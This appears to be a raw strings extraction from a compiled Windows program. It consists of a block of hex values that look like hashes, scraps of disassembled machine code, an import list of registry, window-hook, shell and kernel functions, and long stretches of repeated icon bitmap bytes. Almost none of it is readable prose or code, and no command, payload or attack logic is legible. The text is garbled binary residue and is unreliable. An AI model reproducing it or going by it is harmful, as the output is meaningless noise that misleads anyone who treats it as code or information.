4C247094201EB65DE12AA17F20575ED9
7EAE529F10C8EA87C8CADCC469D1CE76
CE9ADAC29177BF143E24B1BCE2A0859C
5BB894201EF96C9C75AE3F22DD9BEB74
B3238B574B3390358ED3AC8F60226CCD
9FEBFDDC3BFD3D2FCB45F7F1D8FF39E7
199350BB6558935F20C7C2ACB1D2A315
065AC7FCDA71AF7905F67307B1E0131F
184806EBCFA7D9D66674D0362DFDA9FC
B30CD0A83AF9B887FDCB16B4059078D4
0D4261D61956CCBFEC24C5D476B6C801
25A99EB4214CFE27E51E3F9CD7097407
E24026E736358CD755DF447A99406D3A
HH;s+]
SV393u
WuuSMuuuSM,u
uuSMPuuSMptSl|uSx
MMJMMM*M_M^[d
SW39 tb9_
t]V]]WM]
SW39 tb9_
t]V]]WM]vj
SW39 tb9_
t]V]]WM];j
SV393th9s
tcuuSMuY9s$t@j
t>EEVMEqE
(VW39>t^9~
tY}}VM
}}}VME
1`7_^U
187_^-
PQ _|%f}
NYYu^]
Sn_^[]
VVMF$t1D
9u_N$t
VVM=F,
<uN,_t
VVM2F0t-
SCYYPu
P+PS$u
S3V^8^<^@W=T
^$^(^,^D^H^L^P^T^X^\^`^d^h
Xlh@Pj\X=~
Xl[h@Pj\X~
;}/Php
SW39;}
}}SM}9{
X]LTD8<P4E
TT;|gPh
T1;|DT;t
SVWXE3Vh
XuPTH@DS<E
SVWE+3Vh
G$Ph\2
G(Ph@2
G,Ph(2
p[$;th38j
Y}83t4u9HE
SVWXE3Sh
TY|?Tt
9U>_^J
9-N 9#N
VW39>tR9~
tMS}}VM}E
VW39>tR9~
tMS}}VM}mE
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}E
SVWXE3Vh
VW39>tR9~
tMS}}VM}E
XEH3Sh
X]PTH48@0E
;|\9Tt\T@D
;|DT;t
DWXH3Sh
3;@tcH@`
;|DT;t
VWWMjw
MtFW>p
SVWXEH3Sh
WT;|DT;t
SVWXEO3Vh
XuPTH<@S8E
VT|FTt
SVWXE 3Wh
F Ph4E
T |?Tt
TWXE-3Ph
XEPHTVhtF
3Dt^Dp
PTW;|FPt
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}}E
SVWXEG3Sh
X]TPLD
;|A9DH
b|M_^d
L@[L;t
;|N9LtRL@L;t
VW39>tR9~
tMS}}VM}
UQQSV5
VVPVPVVVVVV
PSPVPP
;u?SVP
M_^[T(
S4PW0,
;YtajfY3
,S4P,0
SVW3S8QLQS<QEE
,PHPSh?
SLPSP0
;u`@S8PLPS<PP@D8<
QQWVWWWPh
jd4PjdWh,
PPWVWWW
Yu3YYu
iM_^[b
It{It9I
u`Y3@M_^[s
UQVWju
f}@5po
Wj'Y3d
Wj'Y3df!ldPj
VEP3EPVh?
uYEPEPEPVu
uGEPEPEPVu
UQSVWPo
3Ct&90t
EPShhL
EPShDL
EPShhK
EPSh<K
Ht}HtfHtOHt2Ht
S3VW]]o
]*]]]VME
uM6VMZ^5
M]A^MM\M_^[d
UQV3VEPVh
SV3f90u
utGf=#
f;u9uu#S
f;u3f;.uu>
Y?nt6Ht
VXPjdj
ZXXZ3@^
SVXEqm3j
D8PHSa
D38Q@PWTL
DX8QPWTL
DX8QPWTL
X8QPWT
D8PSWT
D38Q@PWTL
DX8QPWTL
DX8QPWTL
DX8QPWTL
X8QPWT
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt 9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]b X
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u 9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YY hPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YY hPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YY hPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YY hPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YY h
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9 t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9 M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
t u$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht<
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht<
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w @
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s 9~(~
j Yj Y+
VWj Y}
Pj Y+3BR0H%
Yj ^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3j Y+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X }qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
I x@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
